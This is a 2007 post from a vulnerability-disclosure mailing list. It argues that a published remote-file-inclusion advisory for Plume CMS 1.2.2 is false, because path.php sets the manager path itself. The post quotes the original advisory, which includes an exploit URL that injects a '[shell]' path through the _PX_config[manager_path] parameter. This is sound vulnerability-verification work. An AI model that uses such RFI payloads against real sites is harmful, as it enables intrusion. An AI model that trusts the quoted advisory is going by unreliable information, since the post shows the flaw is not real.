[VIM] false: Plume CMS 1.2.2 < = RFi Vulnerabilities

Stuart Moore smoore at securityglobal.net
Fri Feb 16 14:16:38 EST 2007


plume\manager\articles.php:

require_once 'path.php';
require_once $_PX_config['manager_path'].'/prepend.php';
require_once $_PX_config['manager_path'].'/inc/class.article.php';

path.php:

$_PX_config['manager_path'] = dirname(__FILE__);

Stuart


------

##################################################################
#Plume CMS 1.2.2 < = RFi Vulnerabilities
#
#Download : 
http://prdownloads.sourceforge.net/pxsystem/plume-1.2.2.zip?download
#
#Script Name : Plume CMS 1.2.2
#
#
##################################################################
#
#Coded By : KaRTaL
#
#
#Contact : k4rtal[at]gmail[dot]com
#
#
##################################################################
#
#V.Code in : plume\manager\articles.php
#
#
#         require_once $_PX_config['manager_path'].'/inc/class.article.php';
#
#
#Exploit : 
www.target.com/manager/articles.php?_PX_config[manager_path]=[shell]
#
#
##################################################################
#
#
#Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , 
Gurkan142 , www.istikla-team.org
#
#
#
#
##################################################################



More information about the VIM mailing list